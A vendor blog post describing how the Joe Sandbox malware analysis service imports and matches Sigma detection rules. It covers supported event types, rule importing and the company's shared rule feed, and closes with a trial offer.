If the sandbox understands Sigma, a rule written to detect a threat on the endpoint (e.g. based on Sysmon data) could be also used to detect the threat in the Sandbox. Or the other way around, Sigma rules that were written for a sandbox can be applied to your SIEM! Isn't that fantastic? We truly think it is!
Sigma in Joe Sandbox enables any customer to write and share threat detection rules based on dynamic data/events even if they don't have a SIEM!
Joe Sandbox also supports Yara rules (including scanning of memory dumps). Yara for the binary world and Sigma for the dynamic world make a perfect combination.
Events
What Sigma rules can I write in Joe Sandbox? Joe Sandbox currently supports eight different events:
- Process creations (product: windows or linux or macos, category: process_creation)
- Sysmon: Process creation, Event ID 1 (product: windows, category: sysmon)
- Sysmon: Network connection, Event ID 3 (product: windows, category: sysmon)
- Sysmon: Remote thread creation, Event ID 8 (product: windows, category: sysmon)
- Sysmon: File creation, Event ID 11 (product: windows or linux or macos, category: sysmon)
- Sysmon: Registry key set, Event ID 13 (product: windows, category: sysmon)
- Powershell: Powershell Transcript Logging (product: windows, service: powershell)
- Windows Event Logs (product: windows, service: security|application|system)
A detailed description of the event fields can be found in our user guide under Sigma - List of events.
We have directly added Linux and macOS support for the process creation and file creation event. With that, you can write Sigma rules covering Linux and macOS threats!
Rules
Sigma rules are written in YAML format and have a very simple structure. Below you can see an example which uses the process creation event as input:
Joe Sandbox uses various optional meta attributes, such as threatname, behaviorgroup or id. This helps Joe Sandbox to identify threats and do proper classification. The level attribute impacts the verdict of the sandbox. For instance, many Sigma rules matched with a critical level will lead to an overall malicious verdict.
The heart of the rule is the detection definition which contains a selector with fields or lists. Fields and lists have great wildcard support. The condition is a Boolean expression which in case it evaluates to true, will lead to a rule match.
You can find a full specification of Sigma
here.
Importing Rules
Importing Sigma rules is super easy. Note you don't need to convert any of the Sigma rules. Joe Sandbox understands Sigma natively.
To import a rule go to the Editor navigation tab. Then click Sigma:
You might either upload a Sigma rule as a .yml file or a zip of .yml files or alternatively specify a Github repository containing Sigma rules:
In this case, Joe Sandbox will always import the latest Sigma rule from that repository. Very handy for open source repositories!
Do you want to modify a rule? This can be easily done in the Sigma editor:
Sigma matches
Once you have imported a rule, you will find the Sigma matches for the new analysis in the full behavior report:
In the top navigation bar click on Overview - Sigma Overview:
Clicking on Show sources will tell you the underlying event responsible for the match:
Sigma Rule Feed
The events supported by Joe Sandbox cover currently around 70% of all community
Sigma rules.
Joe Security itself started writing its own Sigma rules and decided to share all of the current and new rules with the community under the GPL license. You will find all our Sigma rules on Github:
https://github.com/joesecurity/sigma-rules
Examples
We have uploaded the current Sigma and Joe Security community rules to
Joe Sandbox Cloud Basic. You can easily search matched Sigma rules by using
Joe Sandbox View, our threat hunting & search engine:
Via Sigma, Joe Sandbox found a sample using
Get2Downloader, likely associated with TA505:
Or here, a Sigma based Wannacry detection via the open-source rules:
Joint Power
Sigma is great, it is generic and therefore allows to easily share threat rules. There is no vendor lock-in. Joe Sandbox's community rules, once converted, can be used to search in many SIEMs.
You can write your own Sigma rules and use them in Joe Sandbox. Simply upload them in the Sigma editor and you are ready to rock!
Would you like to try Joe Sandbox? Then contact us today to get a trial for Joe Sandbox Cloud Pro.